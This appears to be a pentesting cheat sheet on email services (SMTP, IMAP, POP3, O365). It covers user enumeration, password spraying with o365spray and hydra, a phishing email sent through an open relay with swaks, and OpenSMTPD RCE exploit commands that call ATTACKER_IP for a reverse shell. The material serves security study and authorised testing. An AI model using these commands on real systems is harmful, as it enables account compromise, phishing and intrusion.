Pentesting Email

SMTP (TCP 25, 587, 465)

SMTP Commands

Command

Description

AUTH PLAIN

Client authentication

HELO

Start session

MAIL FROM

Sender address

RCPT TO

Recipient address

DATA

Begin email body

RSET

Abort transmission

VRFY

Verify mailbox exists

EXPN

Expand mailing list

NOOP

Keep-alive

QUIT

End session

Postfix Config

cat /etc/postfix/main.cf | grep -v "#" | sed -r "/^\s*$/d"

Open Relay (Dangerous)

If mynetworks is set to 0.0.0.0/0, anyone can use the server as a relay

mynetworks = 0.0.0.0/0

Telnet SMTP Interaction

telnet 10.129.14.128 25
HELO mail1.inlanefreight.htb
EHLO mail1
VRFY root
VRFY cry0l1t3

Send Email via Telnet

EHLO inlanefreight.htb
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]> NOTIFY=success,failure
DATA
From: <[email protected]>
To: <[email protected]>
Subject: DB
Date: Tue, 28 Sept 2021 16:32:51 +0200
Hey man, I am trying to access our XY-DB but the creds don't work.
Did you make any changes there?
.
QUIT

Nmap SMTP

sudo nmap 10.129.14.128 -sC -sV -p25
sudo nmap 10.129.14.128 -p25 --script smtp-open-relay -v

SMTP User Enum

smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t [target ip]

-M — Sets the mode: EXPN, VRFY, RCPT (default VRFY)
-u — Check if a single user exists
-U — File of usernames to check
-t — Target host running SMTP

smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1
smtp-user-enum -M EXPN -u admin1 -t 10.0.0.1
smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1

IMAP (TCP 143, 993)

IMAP Commands

Command

Description

1 LOGIN username password

1 LIST "" *

List all directories

1 CREATE "INBOX"

Create mailbox

1 DELETE "INBOX"

Delete mailbox

1 RENAME "ToRead" "Important"

Rename mailbox

1 LSUB "" *

List subscribed

1 SELECT INBOX

Select mailbox

1 UNSELECT INBOX

Exit mailbox

1 FETCH <ID> all

Retrieve message data

1 CLOSE

Remove deleted

1 LOGOUT

Close connection

cURL IMAP

curl -k 'imaps://10.129.14.128' --user user:p4ssw0rd
curl -k 'imaps://10.129.14.128' --user cry0l1t3:1234 -v

OpenSSL Interaction

openssl s_client -connect 10.129.14.128:pop3s
openssl s_client -connect 10.129.14.128:imaps

POP3 (TCP 110, 995)

POP3 Commands

Command

Description

USER username

Identify user

PASS password

Authenticate

STAT

Number of emails

LIST

List all emails with size

RETR id

Retrieve email by ID

DELE id

Delete email by ID

CAPA

Server capabilities

RSET

Reset

QUIT

Close connection

POP3 via Telnet

telnet 10.10.10.10 110
USER <username>
PASS <password>
LIST
RETR 1
RETR 2

Dovecot Dangerous Settings

Setting

Description

auth_debug

All auth debug logging

auth_debug_passwords

Log submitted passwords

auth_verbose

Log failed auth

auth_verbose_passwords

Log auth passwords

auth_anonymous_username

Username for ANONYMOUS SASL

Nmap All Email Protocols

sudo nmap 10.129.14.128 -sV -p110,143,993,995 -sC

Email Port Reference

Port

Service

TCP/25

SMTP Unencrypted

TCP/143

IMAP4 Unencrypted

TCP/110

POP3 Unencrypted

TCP/465

SMTP Encrypted

TCP/587

SMTP Encrypted/STARTTLS

TCP/993

IMAP4 Encrypted

TCP/995

POP3 Encrypted

MX Record Enumeration

host -t MX hackthebox.eu
host -t MX microsoft.com
dig mx plaintext.do | grep "MX" | grep -v ";"
dig mx inlanefreight.com | grep "MX" | grep -v ";"

Resolve the mail server:

host -t A mail1.inlanefreight.htb.

Full Nmap email scan:

sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.14.128

SMTP User Enumeration (Telnet)

VRFY

telnet 10.10.110.20 25

VRFY root
VRFY www-data
VRFY new-user

EXPN

telnet 10.10.110.20 25

EXPN john
EXPN support-team

RCPT TO

telnet 10.10.110.20 25

MAIL FROM:[email protected]
RCPT TO:julio
RCPT TO:kate
RCPT TO:john

POP3 USER Enumeration

telnet 10.10.110.20 110

USER julio
USER john

smtp-user-enum

smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

Modes: -M VRFY, -M EXPN, -M RCPT

O365 Enumeration & Spraying

Validate O365 Domain

python3 o365spray.py --validate --domain msplaintext.xyz

Enumerate Users

python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz

Password Spray

python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz

Hydra POP3 Password Spray

hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3

Open Relay Exploitation

Detect with Nmap:

nmap -p25 -Pn --script smtp-open-relay 10.10.11.213

Send phishing email via open relay with swaks:

swaks --from [email protected] --to [email protected] --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213

OpenSMTPD RCE (CVE-2020-7247)

Affects OpenSMTPD up to version 6.6.2
Unauthenticated RCE via semicolon injection in the sender email address field
64-character command limit
Exploit: https://www.exploit-db.com/exploits/47984
Confirm execution with ICMP before trying for a shell:

sudo tcpdump -i tun0 icmp
python3 exploit.py HOSTNAME 25 'ping -c 4 ATTACKER_IP'

A valid local recipient may be required for reverse-shell exploit tooling. If accepted by the server, root@HOSTNAME can work:

nc -nlvp 80
python3 exploit.py HOSTNAME 25 'root@HOSTNAME' ATTACKER_IP 80

See OpenSMTPD.

Evolution Email Client

sudo apt-get install evolution

GUI client supporting IMAP, SMTP, POP3 — useful for interacting with mailboxes after obtaining credentials.

PreviousPentesting FTP NextPentesting phpMyAdmin

Last updated 15 days ago